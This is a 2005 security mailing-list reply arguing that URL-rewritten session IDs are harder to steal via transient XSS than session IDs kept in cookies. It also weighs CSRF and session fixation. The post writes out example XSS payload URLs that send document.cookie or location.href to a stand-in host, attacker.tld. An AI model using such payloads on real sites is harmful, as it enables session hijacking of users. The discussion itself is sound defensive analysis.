WebApp Sec mailing list archives
Re: Maia Mailgaurd http://www.renaissoft.com/maia/
From: Achim Hoffmann <kirke11 () securenet de>
Date: Wed, 20 Jul 2005 12:32:24 +0200 (MEST)
On Mon, 18 Jul 2005, Chuck wrote: !! Responses below.... !! !! On 7/18/05, Achim Hoffmann <kirke11 () securenet de> wrote: !! > !! In short, you are better off putting the session id in a cookie than !! > !! putting it in the URL. !! !! > In short, it is much simpler to steal session ids from cookies than from !! > URL, exceptions see below. !! !! No, they are both easy. "both easy" disagreed, explanation see below !! If there is a XSS on the site, then you can !! get the URL with window.location.href. That is basicly right, but the cases where you can exploit it are limited to those where you can place the malicious content or link inside the application itself, for example inside a user forum. Or in other words: without first knowing the session ID (which is in the URL) you cannot exploit it remotely, in particular you cannot send an HTML email containing the malicious link. Examples: a) using cookies containing session ID you simply can send a malicious link to a user (or tweak him otherwise to click on it) which returns the cookie like: https://vulnerable.tld/appl.cgi?xssHole=<script>document.location= 'http://attacker.tld/harvest?sid='+document.cookie</script> b) using URL rewriting containing session ID now we have a link like: https://vulnerable.tld/appl.cgi;sid=someSessionID even if the attacker knows of a XSS vulnerability in appl.cgi (like explained in the above example), it's not possible to exploit it 'cause the mandatory sid=someSessionID is missing tweaking the user to click on: https://vulnerable.tld/appl.cgi?xssHole=<script>document.location= 'http://attacker.tld/harvest?sid='+location.href</script> will not work cause there is no session ID in the current URL In 90% or more of cases XSS is present in a transient form, that is you have to pass the stealing-code in a link (in an email or another website) to the user. But in this case, there is no session-ID-context and thus no session ID inside an URL that can be stolen (it is the URL you pass, that you access with location.href). Only if it is in the cookie it can be stolen in this way. I consider this a fundamental difference in exploitability and thus a big advantage for URL rewriting. Other pro-URL-rewriting arguments: - perhaps the second top most vulnerability after XSS in web applications today is Session Riding (aka CSRF, aka web trojan, see http://www.securenet.de/papers/Session_Riding.pdf) URL rewriting is safe against Session Riding. With cookies you have to take further measures. - Session Fixation, although not generelly impossible with URL rewriting, is much more often encountered with cookie-based session management. Of course, there are disadvantages of URL rewriting and it depends on the application: - application has to ensure that the session ID is not within other links - application has to ensure that the page does not contain links to external websites 'cause it then will send the session ID in the refer(r)er header But in general I tend to recommend URL rewriting over cookies. Best, of course, is to use both: the session ID inside a cookie and an additional secret inside the URL. But this is much more expensive as it is not automatically handeled by todays libs and frameworks. {-: Achim
Current thread:
- Maia Mailgaurd http://www.renaissoft.com/maia/ Christopher Canova (Jul 16)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Chuck (Jul 18)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Achim Hoffmann (Jul 18)
- RE: Maia Mailgaurd http://www.renaissoft.com/maia/ Guillaume Vissian (Jul 18)
- PHP Session ID's focus (Jul 19)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Chuck (Jul 18)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Chuck (Jul 18)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Achim Hoffmann (Jul 20)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Chuck (Jul 20)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Achim Hoffmann (Jul 21)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Achim Hoffmann (Jul 18)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Chuck (Jul 18)
- Re: Maia Mailgaurd http://www.renaissoft.com/maia/ Andy bentley (Jul 18)